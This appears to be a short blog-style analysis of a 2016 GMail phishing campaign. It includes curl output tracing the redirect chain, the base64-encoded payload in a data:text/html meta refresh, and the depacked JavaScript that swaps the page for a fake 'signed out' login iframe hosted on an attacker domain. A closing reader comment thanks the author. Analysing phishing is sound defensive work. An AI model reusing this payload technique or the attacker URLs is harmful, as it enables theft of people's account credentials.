The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.
DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)
I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:
This linked to a page that ended up displaying a fake "you've been signed out" link, via the data:text/html...
URL feature of Chrome:
The hijack page is a fully functional version of Google page, including animation, and is setup to steal passwords:
The fake attachment image linked to http://x5.to/A78
ƒ curl -vvvv http://x5.to/A78
* Trying 112.78.125.184...
* Connected to x5.to (112.78.125.184) port 80 (#0)
> GET /A78 HTTP/1.1
> Host: x5.to
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Fri, 11 Mar 2016 11:38:08 GMT
< Server: Apache/2.2.31
< Location: http://bowlanreedesntal.top/services/aboutus.htm
The 301'd link uses the meta refresh tag to setup the data/url page, using a base64'd HTML document, again using a data/text:html
URL:
ƒ curl http://bowlanreedesntal.top/services/aboutus.htm
<meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj
ZShuZXcgUmVnRXhwKCdcXGInK2MrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCczLjIuMTg9
IjE3IDE2IDE5IDIwIDIyIjsyMXsoMTUoKXsxNCAxPTMuMi45KFwnMVwnKTsxLjg9XCc3LzEwLTRc
JzsxLjExPVwnMTMgNFwnOzEuMjM9XCdcJzsyLjI0KFwnMzZcJylbMF0uMzUoMSl9KCkpfTM3KDM4
KXt9My4yLjMzLjMyPSI8NiAyNz1cXCIyNjovLzI1LjI4LzI5LzMxLjMwXFwiIDM5PVxcIjQwOiAw
OzM0OiA1JTsxMjo1JVxcIj48LzY+IjsnLDEwLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNv
bnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHx4fHJlbHxoZWlnaHR8c2hvcnRj
dXR8dmFyfGZ1bmN0aW9ufGhhdmV8WW91fHRpdGxlfGJlZW58U2lnbmVkfHRyeXxvdXR8aHJlZnxn
ZXRFbGVtZW50c0J5VGFnTmFtZXxib3dsYW5yZWVkZXNudGFsfGh0dHB8c3JjfHRvcHxzZXJ2aWNl
c3xodG1sfGNvbnRhY3R1c3xvdXRlckhUTUx8Ym9keXx3aWR0aHxhcHBlbmRDaGlsZHxoZWFkfGNh
dGNofGV8c3R5bGV8Ym9yZGVyJy5zcGxpdCgnfCcpKSkK></script>"
That base64'd HTML decodes to packed JS, which depacks to:
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://bowlanreedesntal.top/services/contactus.html\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
Which gives us the final result, a page with the title "You have been Signed out" and the fake login in an iframe.
Great analysis. I just received this from someone and thought it looked fishy. Found this right away.